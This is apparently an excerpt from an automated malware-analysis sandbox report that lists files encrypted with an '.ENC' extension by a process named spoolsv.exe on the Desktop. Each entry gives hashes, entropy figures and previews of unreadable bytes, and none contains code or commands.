                                                                                                                                                                                                                                                      Preview:>.........*.Z..Y.;%...`.....c../.ue.. .<.N.(:.,E.L....+4.... ..pi.E....O.t-..N"Y.M..IyG....O...q.).N.ae...>...s..C.....<."..E...\.yO|!...8..-....,.~Y.c...t.s.....J.y%.....4..`0....Co...S.r.h..IF.5..MG.nk'E.].v.vt.Kmm...w..a..J.dK...u.2K.j.k....W8...1Ah...=.%.......++N...L.R....D.e.."..Z.9.cw.t......rY....K.1F..wK..OY........wm..q.....hL.{...3H..........C. .aMn.>.E..~.R@.?G...@.{..+...b.0%.J.O6..$H.k.../.l.....n..S...o.....@.....:....r(.........D[p*:.*^Ak.N..r..h...Y...r..s.'...K..T....c..T.0....J..............].UW../...."Vg..T$R.A../..hK.1J.uW..E.':..e.}._..$..90.,.eq...c.Y...^m..92.m.H...].n&...u.Gu).......O....c*O.................I....D6...)@..c7.I.*..Z..#uQ.......^.avI.......[X.Z.....$m).0..........X...,g.....{...=.z%...PA.....%?..C.....Jc'r.a#..8...h......0....%'. l.<.V..G2(...w6M\&#b...".F;H..g2..!f......b8...:..x.O.d.?...G$....Y....M...Vbg^.)....d..s..m@=I.=(Or...*.r....45..!.....v.n.n....*.eK..K.*...+09.!.c2.....#.."._..y..5.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-sl.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):6640
                                                                                                                                                                                                                                                      Entropy (8bit):7.968380179945327
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:A932echSzkCw78qOWqEGBr8QqLJSJTy4N4h:A9SC1qOW9K8Q5W4Nu
                                                                                                                                                                                                                                                      MD5:ABC33BFA54C70BFD8AFAEA34A6379C0D
                                                                                                                                                                                                                                                      SHA1:B07BA04DAFB9F070724506C6D5DD970E0D42AF1D
                                                                                                                                                                                                                                                      SHA-256:FA81F2E8FC45C2A4D823EB898485946D44032B4E27EAF22A166D793F01E1729A
                                                                                                                                                                                                                                                      SHA-512:E03C85327380AF1E67E269ABB6F004C0FA0BB697CB8486F243DD8D2DEB311FEF5E8BE885BED4C6BF5E7D6EA179FBB67E90697616D786314971A1742DA55BBFA6
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:D..}..6..q.......L},...W.....mK.z(.o...@<hZ.B..^J...V?3...rK...",u....<V`.......U.ho.b.:.%......,...0..k...Mn.....r#kK..#0...@.Abr..j......N#..5.l..F!...<0.T..l..>..~S/u.....k.......X.%O.'..&...\.K.~Ed......z.....e=2....i.`......6K......R....u.<\....h3....:I..p.....b`...{c.....`i..>. ..7[.....c.<.6%......x..X..}.u.....5. ..A.K......^....:U..(..T...#.b.Q3......nw......TE$I.....-3V0......8.[..<.$.2.op..u...R....e...s..G(r?..K...k.x.......L.m..Ye.........u...l..{.;f..%r...:9h..q2.F.s,..!.@@K......O...x..&g.+3|hl......`b.....|..A..!.........`.(..G.<I.b..A..f/8}R...~...#..8.F..W.:S.9.=.%$d;...AF?C....6...R ..\.9....5.....,=.q....A1.l.EY.5.+.d.*.2.1.'L..?L.o.^....k..*...e8.j..SI...>.?.S>>w.......xt....6.ai...0.)..........8....q&.2.....U3.WLP.f........b@t...)8H......D.r4i..C9re!l...eL....8'w..t'L..h...........)l..O......ra..IxD.%....i~....O_.n.9..H<.yz.....r.F...|.qIH...&r.^.M.T]./.D.g....[..lR..~....../...........Ci j.U.._62....x........,.....<8

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-ta.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):560
                                                                                                                                                                                                                                                      Entropy (8bit):7.597793778093133
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:ybJPsPMXTScOudUe6mMy5cLYuHaPCSxq6:y2PWTSBheXMy5csion
                                                                                                                                                                                                                                                      MD5:ACCDFD5BED8647A96B40B6DD05053D59
                                                                                                                                                                                                                                                      SHA1:B1FC036AE16B60C492D0E1482433459DFA129DB5
                                                                                                                                                                                                                                                      SHA-256:555CC9E9FB4344FBBECAEE91FE5CBE7CF3876F53FDC101169ED25868E64F5047
                                                                                                                                                                                                                                                      SHA-512:5A05FC522D4B28CB3849A959CC5158655A3518F70C9B7BFABD770D10CC54546B40218143EF854366D582287A0CC19F5767A4D4EDF3C0BEC6E6132D4F22C0D9E2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..U.Ks..}...-.!...V|.X...'BF.:i.H...b.D....W>.j.b.n.r..\....Al.....C.]..9.d....C....!......c{....gG.7/P.gS......;......]X...#...G..z.`.hj..rC...p...v6".z..#,..s.......V..=<..W./L..)u..?.Q..L...bQj.^>....#9A...X...AI.*....x.4.+.U.J.....\b.G?...rq..\....?.e.......;..{.kR..-.~X.b...gF..>.>U.l..W._.r:8....G.Hv=....N._..n..x.lf5...c.r6xK...n..9..gqM...~r....i&FU...K.u......m..DTQ4....4?3jX.33v&P:H...\F.H#....."et..dB^[J.S....@......@..2....0..SPe..&3G..J7.Q.8..Q.!].7....K.R....=('E.]?.....p.a.}.x.?......7"..y[._..+.....T..[%.....!JS

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-te.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):704
                                                                                                                                                                                                                                                      Entropy (8bit):7.683969741045192
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:12:tdwzMBT34Wx8EocXv6GWhKRlojbKLyPKSdKcK0hZb7U5SV+ASRrVPffEGnu+01Y+:h4TKXvJm7HAS/KOQ5g+HllMGnwYXlGR1
                                                                                                                                                                                                                                                      MD5:FB7F79A8E52E564FF1CBC6DCC3524C6C
                                                                                                                                                                                                                                                      SHA1:BE726714170FB15BB361CD8BE90DCFAC0B8B9067
                                                                                                                                                                                                                                                      SHA-256:F99289A87028FB098680416F8288E1673989DE9DBD909719D58035D1B0DD78EE
                                                                                                                                                                                                                                                      SHA-512:C967E1AD8926C9D095967E68B77772FAE56316C9108207FBC265C4D610BF5F7B1EB3C597BA708F6531BAF2B00D61706C3C3302D24DE66F163BC51EFE644148F3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.!.U-d...b.C.....m+.."x.f...L..Oc....}F<'-............4..).9.......f.g...X..6....a.......#..!R......-..l\..(.l%a.hz...T.x..X"...z...2.........,........S.l...Ds.D<q.+...N{Pt~.5..6IL.(A8.[..i^..g....n..D.>..,....s....7.....Z.O...P....8..An.^...^.W..m..5e..m+..|Q]=l....?.Y.ZJ.Y6..7.Z....-..#...[J...wE...=.........J........sjS.8^..#.L(K..M......6M.~../......)>...&.C4e....kz..A-..Yv..}.v...&..)...I.$..<.}.L].............&.J.@..rYts.Liu..MWO.2K..{.I..%t.......^...1./ ..U...J.b.#.....E$....e.$..S,.A..O..[..u-..-.."...N..M.0.U.r....ul.l.."..e[.77.......I..}.\.z...p..MN........G..6..h8S.%u.JuV...l.es6g...<.VE..&.*.Q......d..U<[.2..6......7...x...lU...cl.F;%..~.Q...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-tk.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):2720
                                                                                                                                                                                                                                                      Entropy (8bit):7.93231312736979
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:xQRsgQvOjyWa5nPC5K2n6oDOOJWRM+WFaifZdO7C2gzVPPs1Xcm9e8Zfg0Ua:WRQOJ5P6HsWRdWFaifZdZ5+cm93l0a
                                                                                                                                                                                                                                                      MD5:01D775D6E7BA8C65D535EC89C44E0F16
                                                                                                                                                                                                                                                      SHA1:86E2F729F270D9081B1F1CE0C2C9724DE88F3BBF
                                                                                                                                                                                                                                                      SHA-256:E4F10DDFA40615178D1A225FD45DCAADEC047DFD5B70598AB011B38D7A3F2068
                                                                                                                                                                                                                                                      SHA-512:52C9AFC426240F2ED6F1C973B7E43902EC2F8168C4A12E17B159D457C97B83733B4392525D4A09C2C3EFF34B266125830F7DA6987927294C8CA77E5EBF29BD29
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:626|Y.m.n..!....Un.l..4....%?....LZl....@...nEH..n<.c...D.........T.(Ufc....'...'bY..yn..:.'......`...3........CO.qB;....+....Q..lKZ.3DSA.a.K.."...V..|..:F....R...w`.6..|....6y...l.E[p.<.h..h~..N..i..a:'.z<g.....E.1.l+*...z.......T..&....>g..1.@f.L./E...n.......I.d..a..4...]......g....V..../%}....2...4L./b.....4.b8...P.&.e..e...O...JQ>.......E%...h..E3.A.?%.qx....%k.@...$?..x.;Y...%r5........5p..NU.T0y...wS>*.m.......s>-C<.....8..'.....{.'3...?.)....'.]....A`6...P.V....r..,'.Z.;..4..Ba$$.........)..:..J.*..Dr.......~.#..-..T.."..I%.n....@-$..A.zY]z\?.T.....y}.`l.....=x..S..<.....%<l`.a..2.%|O.V...{.p.%.C..y...6z......(Bw...p.....[....s.I.....|?...gr.ij`*:...Eg?.OH,.. ......y..Rh..D..(.....p..K.......m..'....|......Ax'.{o..*.kx..L~.!.j.VJ.../H.....C.Ag...J=.5.!E.D......{.3.U...@..?..#.eP,...h.\.>...~Q.._........K. .s&._#9.<:.L...D..c.L..a6..Z..7....9.......z.1..t...Wf.8.H:...._/...h..i$...".OQ.h....;^7.Kp.[...W"..Q.F^C.f.6TD.7......t.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\hyph-und-ethi.hyb.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):3488
                                                                                                                                                                                                                                                      Entropy (8bit):7.947993023952334
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:48:TISVKcIZShB+MAyrvu9l3KrcIKdap1+A/z+CMfaYdcwKnRH/JWshdK1qUdxX:NpI/2Udve9MfaYdzuRYshdKEUrX
                                                                                                                                                                                                                                                      MD5:FC656D3F028C33C3A91265E052E882B8
                                                                                                                                                                                                                                                      SHA1:3A7ABD24C2F8C420401EA6B9AA91A00B3448F2E6
                                                                                                                                                                                                                                                      SHA-256:F900F0628B4A1CF314A38CD52D88AE91BFEF7516AC6FAE3F2C86E1DAD276C64E
                                                                                                                                                                                                                                                      SHA-512:BD4FBAAB7ED383474DBF81858AD357A2BCBAAEFF7FF29D995C12FAE07B428930920E797E4907D4780C6A55D70D9D42B35FC5AB22A1013DD95098CE9776F779E0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..3..8..<W.>wJ57..P.........6^..>...O..^tB..Hude.=....d<E.......M....o./.~..2.x......".-.v...".\q..C.B.gu.........Q(7.$.{..|....\../$...O..X 6.E.s%../..9%..".x@...6.c..\...A......2...{V....!..r.P}.[.[..\zq..r.?..z....n.v{.....HV..x.@ ..?....z,...WW..[.....9]....K..........S.*..n..f.@fF.......{.1...N...~K6.,.ZZ......*O...kt;..m..Pc..t.O.M......W...6..[.G.f..qy*.T.3.....Pn..i.....E..]....~.h.}..^.......:..$....|...0...M.8}<..Ya+.....og..kG..>.........Lt?...f..8!..8..R^g......HM.......dkA......:.q.|....y ....M....."...8z.G.B.dAN........5T.j..Q....+-'.....TP*.RN.....M_..5...W....:A.... e..6<.....H.KA6F...yC+`.V"G.,........B..t..3.dg..s.....2..R....#.a........Iv..G./.QMD.@>.g........yh....tG..R.P....1.....SM.58.^.......3......R.-..!.....+...0.f.....}....K.F7...Xv].F..ix....J)..Ho+A....W..$,I.......(0.xQR...$.^..c..s..\.+n.%...@.ls..^.#.....~....h...z.#]g.....I..=b.c43.Hd7..A...%...5.Qiq .@..o.m.,..[jx.}t@..6;.W.Q....}.9.Q....;......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\hyphen-data\101.0.4906.0\manifest.json.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):192
                                                                                                                                                                                                                                                      Entropy (8bit):6.790335287021747
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:e1Ii5Ci9NBhg+jmz84Goj+AJiW9jjfEA8ClDwqtfv7Tcx0PCM4xDExnCqzQ7AGPY:e1fAirBh3mfjhwEMApDwWX7TcYl4KNCI
                                                                                                                                                                                                                                                      MD5:73BB345ED6479E537ECDC1E05C0496C2
                                                                                                                                                                                                                                                      SHA1:73CD44ACE966EA3608EFB54538B3939D3C4EC3FB
                                                                                                                                                                                                                                                      SHA-256:C87FED492716A7AA9BB2F925DDFDD850595D81CC83E39D32A803445D7832084A
                                                                                                                                                                                                                                                      SHA-512:5F3CC0F69C5B7436F0DFADC82831C75011954FA4D04A7361192EFACBCEBC58726990534A34EAD93BE3EA1C0D12F11793790D5ABF751CD5DDA26683169E23721D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:F..B.{..$g.Y.....}....\.1.d.Ok...ej.5q.....\.^..F.xg.'4~.p....'........:.eY.'@.U#X.3.tl.....O..'..P.Gh4.*'..P}}........4.c..G...r..g......ec.D)..]$.YHx.....1.Vc.X<6.IW'F..rl.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\23001069669.ttf.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):237936
                                                                                                                                                                                                                                                      Entropy (8bit):7.999217614306627
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:zBLehSH1MxaF3WcvaGrH245fNYP33QZjhx5zhyu+:NLehC7F3Wc3W45FI334rg
                                                                                                                                                                                                                                                      MD5:DE57FDCE3DBBB3821947171AEC233863
                                                                                                                                                                                                                                                      SHA1:DB0B89B035BF3A085F85819F03F56828758A0A85
                                                                                                                                                                                                                                                      SHA-256:F534F6D26C77E88017E016C9EB0CF823502BE90B8D1BC5FC1FB6B5B0D73552DC
                                                                                                                                                                                                                                                      SHA-512:C72C22A474556FF20835320D121ECFBFE1F475FB467E5EFFB45FB526D45871836BAFEFE73E687645C20466EA819AFD3A6A94D1674D62AA9CFA08B898B20FC46B
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..G..n.......z...nG.m......[...P...~0.(...FF.l^c.....A.9.~.u.......J{tI...L.-..`..l'S.@.)... ..T5@//...E@.^g....V.+..B...y.)..P..zi7...y....s..o..-h._]..`.X4]$.$.....#.v.p...?.[.p....Py.|.;.X..J".h.k;.45...h.m`.....:o..VQ.oyV.^^.#...".Fa....j~....f.1cQslz..,.|k..'.....:T..x...Zs2...\..X.....D.\.#t..:c.A.....v@...g."%......F...H(.....Y..X0.o........*5...v.D...r._....M*@.j.w.;#.....P.'.*[...........7.!...O.-8.WN..:H.r;.{..o.dBCG.E\ur.J.v....I...>.i.C{...Fs?7/."....B!...)..*.!..Yk.o.KmS.o.v...q....}rB.i..}+.|..N"......."5...G..]N)..CwF.Kt..3.i......4....r.....Z......Z.!.c........K..../.....Z}.+:.}'%...x.m...`.`.Ov...-..Mj..~j(......f.B...~wr4D.....-My'.D._8..s...{.>..a..$%.B.?.....`.(XL.x..........Vv...q....<.j.'.h..B.XJ.......u.....u.Fj..M..W.$....d>..M@...Z..yN.T...a..@.H9..1}.W.!.._..."...R......P....;.36....Mf..D.-..r.0.Uc._z..,.%.....u....`E...v...nJ;.....=...xx/H.bw....'nJ...4.K..U...\..|r.C.........(..r......>n...?<..sT.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\28367963232.ttf.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):240560
                                                                                                                                                                                                                                                      Entropy (8bit):7.999299768924585
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:43qZDsBMGMsT1mr3X7ksWxgVJG+cOGu/o3:QSDHK1mTgsWxgVcDOGu/o3
                                                                                                                                                                                                                                                      MD5:3EE882089696936D4BD732CD77C3D0FF
                                                                                                                                                                                                                                                      SHA1:3A56C7DDD84E96D8FA2AFB0F90F711E87335E95E
                                                                                                                                                                                                                                                      SHA-256:F69DFA72A6092FA41EC0440C0C9D3310B082DDA36F19EBAE1ABBF46BEC92919C
                                                                                                                                                                                                                                                      SHA-512:096A75E74C48E340040D6163BCD5CD53CC5BA70F0C80C26F24CE952FEFF19CFC190ABE92ED149D37E6F61471F1895E8E70E92D47044C20FD80607D60A9CA0097
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..G..n.......z.Q~J.U.[.P.......A.v.f...O8qP.i^..i..)@......_.Z....~hBN..[..L.!...Z]=Q..f.,*/a,.^eu%K..3=...s.....C.:.9.'=1?...`..\A.f.....}.....K .&.........#......!c0H[...|+z.}...3i..zD..U.nB...T^.b.....iaT.B.&%..>9x...>...fr..&$p...#\....2\....T...2.dQ,.i..)r`k.(..]....._..,.W..Xf..t..J.i@~qjMi........?.f....T<..xX$...`T...%..s/]...\QH.[!CW,:M.u..*..=...M./I....8..^#+p....p.X3.Vx.8.."....,,e+.kj.....:.Z<.fd..pX.tOv?i...Q.%+(.....Y9.}..N.~..;?^.a.D...8v.M.z...#wn.E... .6..lb..<(.S./....[.\W3.:.<B....q_.<.U8...t...4...t.Kp..Hp..m0...k>.>.......so.sh....D....B....tr...&...v....Z..._y..9....E=...G.....\t....@..IP...tU@..@..X...5.k...0J......>...T.....d.EITi2.%.+...t.W.e.biu.......-.. ..n.C...TG..,".\.R.......m..{...)5...i..@..Z>..z...t.I...5..:0:.......R..i.V}..J..u-..y2.....t...6.mw.....u....X......K.e.H.d......j. ...y...G...ke5ke[......W...@.l.].O.~kLB.....f..^b~~...../..6..)[?..Ly.76XBz...3.3/.]..l.k.... .....S..i..<g.n|..........N.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\29442803203.ttf.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):241424
                                                                                                                                                                                                                                                      Entropy (8bit):7.999158249770224
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:rc5f4ND090eSVojn873sLWKZRE//O2k23U1D+:rGW09UoIibcI234a
                                                                                                                                                                                                                                                      MD5:DA0F1CB474C37FB348F79284CEE99BE7
                                                                                                                                                                                                                                                      SHA1:FCE0CFBE9AB2B1C578A1DC73E94211D083EE249D
                                                                                                                                                                                                                                                      SHA-256:D07A4894B68C381F301348AAC12ECCFA0BA25DBF783C010F72EB5B0AC4444F40
                                                                                                                                                                                                                                                      SHA-512:EDDDD4BD4B87E28106B8DFB54BDA95027EE4C64E5D67C84D9C8D7D2F709B9B0CDF6B189AD670C1FACFA46DFFD7B049901DDD30DEF4A38CD8275A944986278B70
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..G..n.......z3.p..(..QC.R.G.(.#..Chr..3...`..H#......u....n\2S.U_..P....E.N*..)..i.C..*.[Fa2.`..Y:..M.[q.Z...d..+..p...(6.....v\.d.....>;Gn.......n...Tp..d.l..C0.wE..\.P]hA|.:.tO|_Q..z=......+.....{.t......*....=h..,.r......Gu.!.t.....f6.....KD.r..0.|%..W.3..]W}v..K%=W?...J.WI...z....W..u.O.<....oCax.0.D"..o...g.../.r..>.}....2..x}E....%.:......s=.^...z..Z..4m].2z|.|.....c.]T8.7..X.0.@d+(*......^=2...~C.A.C.tw.....lUG....8.y^...{..*$.:Z.x"o.......5.Kl\.....j.....qc...[.~.V+sG..... .=.....;.5.Q..[U3....9....P.\....>@.l/.=.z.....5*.....%4........D:..D.G.D...{q...^LZ..*.&6..C.3}./.y.z.SU...0..!..t..Z.wt...YD.[l.R..={$...,...Z.@...U....Z.@....I..=.....9.52/||..].z...6.M+....9t......\.WK..1.v9...XK.wQ.~.3......~..F.i'.....4Z....!..)...0.K..o...l........?g3D.*.c..ks...).....kA.H5..6....V?.`.@%(.+.....w,..:.:.?..)g.-.=l...M../.....d..G.!.g..W..F.-F...#..D........ ...<.=..F1$......Yg...u....f`1.F?.@.}..^.........]...+L......lh(5kz

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\30264859306.ttf.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):238640
                                                                                                                                                                                                                                                      Entropy (8bit):7.9991454276808165
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:BRrmC75wu1mXabGGn5SGTGML9U1Uq4q79U6tlsq29j6jBw:BJmCdwnKb1FGxmyUo/Uejy
                                                                                                                                                                                                                                                      MD5:D8D027FCE8D2ADE85E2BE1797D5695B6
                                                                                                                                                                                                                                                      SHA1:E74494B37FC9AC74BC4E947D6383218AC329F88A
                                                                                                                                                                                                                                                      SHA-256:6EFB7F327133F7021B04449C404866C849CC5D630908B662D5D85FC9013AA273
                                                                                                                                                                                                                                                      SHA-512:F224968779F349D9A0FF3582F17764B4AA3D57D42484ED585320DD0A060993B8B8B84ED75170B2FF39C1E30A466C3268C38CFDB616F9C49355151C78001618DF
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..G..n.......z.....S....w..j....f.zq.H.L8....'&...By...0.....r......[...K.l...N...T...j.+.J.'.ivnW.....[....)K..Y.......5v......3.{.8.v..m..,).w.hv.f>..Zl^..x.cY.2bH.4tN...$..._ar0...l.\W@..`!"....m.r.t=..>1.N.._.D..K*.........e./e.B..q?../`......j....k...;.z.....+..!q@&:.....w..pz...*.|........8A..{g.....R..k.l..L..v.5g.........F..J.K./j.1!@..L......B.......,q..1...Y.'.XY.(x..B....#.2...}p......s..........~...8.....M../m..Yt.$.Z.iN&.........qJ.= 7.F.J5.j.T...V7m..5iI.ZAD..^hrR)...m.bo9....(.g..i!.x.....2.(.gI1-y...Ks....$m.g....DQpy.g....E.GM.1.M*Q......J.-.........-..w..d...,T.........x.yw.\..!+..e.v........W...J$h./..>....r.FKx...)l..\..o..MS6.td.._B....r....=b.r.M.....ku.....%0...R'}...,.T....#._g.}_......xW."...g.^..+."t0..V.7a.:.H@!@...<_b......[.i...|...(WS.G%..1.....kK....-.p....@5..3.......x..G@.H.X.y5F...P5..e..A.~z6...N.......>.:(T. .F.K.g<?....o.......-|..Wg9......`9.!..c.[...a.^..!.j...7...2...!.U.'....&>....B....g.A..j.4]@

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\24153076628.ttf.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):237584
                                                                                                                                                                                                                                                      Entropy (8bit):7.999199703289925
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:dLnIrQEYXOfjCZoU9f0aOBbtAFIpcQSC0dWGmku0:VnIr4XO49VEOFIpzN0dWrF0
                                                                                                                                                                                                                                                      MD5:D612B4B08F19DB3241126AC675812234
                                                                                                                                                                                                                                                      SHA1:12F2A5D4B3B8B4918648A8D2BFAC9FDAA8DE8AB9
                                                                                                                                                                                                                                                      SHA-256:354FB83531BDF8029D183E9245C5C4C8E049F1F0F26E56C9D2A9E0BA0DE859CE
                                                                                                                                                                                                                                                      SHA-512:C6A7A054011E2588153678321F8267F519EC2F23D94C1AE4C0E1AEDC9579C6F0FB261EED55A44DCFC87D794375818BB57E2369288D968D7527E9C50E6B8E8D7F
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..G..n.......z.!R.*....... ..J.-2...o.Q..o..;.HC.O.<...&.M.p...1&G...g..H).t..29..y..t$.5....\..n.3;.X.0O.R<.=...C.....JcT...&...Oh.fY.ZL..t...#..U.-h....A....#:.9..C....V.E.l..:}.E..Bx1.gE.Y.(_H..y..a._......c...go..........)V). 1...4..".P.I..)...7..Y$qfz....an.e.\&.Y...?U..4@x.a..]..........NV4....m..&A.GP.i...tH....&......I..>.....T..&>~....H....%..."+Uat.....I..._U.7.......w.....}!..9k.)8..3f`... .-......]x..@Gj..5..o.54.....slb.G5.}..T......k...=...3....+.0.w&.Ox.C4......J.`avpO.......6.dq.R...>..zg....<.5...!..K.%y.)!..'.)...^.g...fr....d.....D'r...33<.._\.._.}..ke..&e.H.LT..v..:-....8.s.~..6.:..N........]=..M..:.. .p8rm>...K."I3H?.M.....=&.. ..z...-..XV...I.._.2w.9....Ly$.A...:...Y@.j:~,...S..c..k.[..X...Y.?..p..9..._@....K.........F.;@3.7 .<...........&.Y[.3Lh.n.M.~".4.? .d.r.K.O.`.y......v.......d.c..m.8t.H&D..+.......|e.............f....".B..._NM.9.*..}....2Y.+Q..A.F..;.....t..1.E.....F.......n.%..1._..=.\.........eD.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\30284701761.ttf.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):241056
                                                                                                                                                                                                                                                      Entropy (8bit):7.99930276620686
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:6144:ZE43aNwFn1tULCAF+tbKrpCyaeoOWd5oAzVSwsF:ZE43aNwFniCy+1KpVFd8oAzVSwsF
                                                                                                                                                                                                                                                      MD5:055720A3F4FA442FF7DDCC81B7D99826
                                                                                                                                                                                                                                                      SHA1:5DF1B55F83A11097CFC76A65859D5D1C814FB21F
                                                                                                                                                                                                                                                      SHA-256:9E33E576C301D9D8833D229F993369E1F52FC520AC869E78237028242EBE4F11
                                                                                                                                                                                                                                                      SHA-512:0F55FDEB5DF5C652DE83C28E45AEEFC607ADE737FC3DC00E0983B0F0697E74CD95C8EA1789D9E573925247945678CAA0EE30EE1F8CA2B15DE6B25F093F06A1A7
                                                                                                                                                                                                                                                      Malicious:true
